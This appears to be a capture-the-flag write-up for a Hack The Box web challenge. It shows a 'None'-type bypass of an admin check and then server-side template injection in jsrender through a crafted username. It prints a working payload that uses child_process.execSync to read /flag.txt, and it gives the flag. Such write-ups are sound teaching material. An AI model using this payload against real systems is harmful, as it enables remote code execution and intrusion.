![Pasted image 20230324131541.png](../assets/Pasted%20image%2020230324131541.png)

![Pasted image 20230324143904.png](../assets/Pasted%20image%2020230324143904.png)

Visit the url and go to `/register` endpoint and register as normal user to the website, and login with your credentials.

Now visit the `/admin` panel. It wil authenticate you before giving access to the panel and intercept the request.

As i got to know by looking at the `AdminMiddleware.js` file from source code, the

![Pasted image 20230321145426.png](../assets/Pasted%20image%2020230321145426.png)

![Pasted image 20230321232231.png](../assets/Pasted%20image%2020230321232231.png)

`/admin` panel is accessable using `None` type

![Pasted image 20230321233106.png](../assets/Pasted%20image%2020230321233106.png)

````js
router.get("/admin", AdminMiddleware, async (req, res) => {
        try {
            const users = await db.Users.findAll();
            const usernames = users.map((user) => user.username);

            res.render("admin", {
                users: jsrender.templates(`${usernames}`).render(),
            });
        } catch (error) {
            console.error(error);
            res.status(500).send("Something went wrong!");
        }
    });
````

The function is really not doing anything except displaying registered users using expressjs template engine, we can abuse it's functionality to get our flag.

![Pasted image 20230321233533.png](../assets/Pasted%20image%2020230321233533.png)

Open a private window and register using ssti payload as username

`{{:7*7}}`

![Pasted image 20230324143700.png](../assets/Pasted%20image%2020230324143700.png)

![Pasted image 20230324143721.png](../assets/Pasted%20image%2020230324143721.png)

![Pasted image 20230321232252.png](../assets/Pasted%20image%2020230321232252.png)

Payload is being executed, now it's time to cat flag.txt

````css
{{:"0xRyuk".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /flag.txt').toString()")()}}
````

![Pasted image 20230324132843.png](../assets/Pasted%20image%2020230324132843.png)

Now reload the `/admin` panel

![Pasted image 20230321232717.png](../assets/Pasted%20image%2020230321232717.png)

Flag is not displayed completely, right click and do inspect element.

![Pasted image 20230321232818.png](../assets/Pasted%20image%2020230321232818.png)

Flag: `HTB{Pr3_C0MP111N6_W17H0U7_P4DD13804rD1N6_5K1115}`

Reference: https://appcheck-ng.com/template-injection-jsrender-jsviews
